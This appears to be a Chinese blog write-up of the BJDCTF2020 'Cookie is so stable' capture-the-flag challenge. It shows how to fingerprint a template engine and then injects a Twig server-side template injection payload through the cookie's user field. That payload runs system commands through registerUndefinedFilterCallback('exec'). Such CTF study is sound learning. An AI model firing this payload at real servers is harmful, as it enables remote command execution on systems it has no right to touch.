[BJDCTF2020]Cookie is so stable 1

首先打开题目发现是一个登陆框：

在这里插入图片描述
经过测试发现有ssti注入：

在这里插入图片描述

在这里插入图片描述
然后是检测ssti注入类型：

在这里插入图片描述

在测试一下{{7*‘7’}}
发现是：

在这里插入图片描述

输入{{7*‘7’}}，返回49表示是 Twig 模块

输入{{7*‘7’}}，返回7777777表示是 Jinja2 模块

所以判断是Twig

根据提示是cookie,于是登陆后抓个包得到：

在这里插入图片描述

在cookie的user处有注入

应为确定是Twig注入，所以是有固定的payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
1

得到：

在这里插入图片描述

获取去flag:

在这里插入图片描述

参考博客：

相关阅读:
SQL 练习题目（入门级）
Flink的单机部署方式
Mac 睡眠唤醒不睡眠问题
SQLAlchemy学习-5.relationship之backref和back_populates参数
类型体系与基本数据类型（第三节）
半减器、全减器和减法器原理和设计
计算机网络-性能指标
C++基础——匿名对象介绍、拷贝对象时的一些编译器优化
04.OpenWrt-连接有线网络
Oracle 19c Active Data Guard (ADG)新特性

原文地址：https://blog.csdn.net/plant1234/article/details/125022363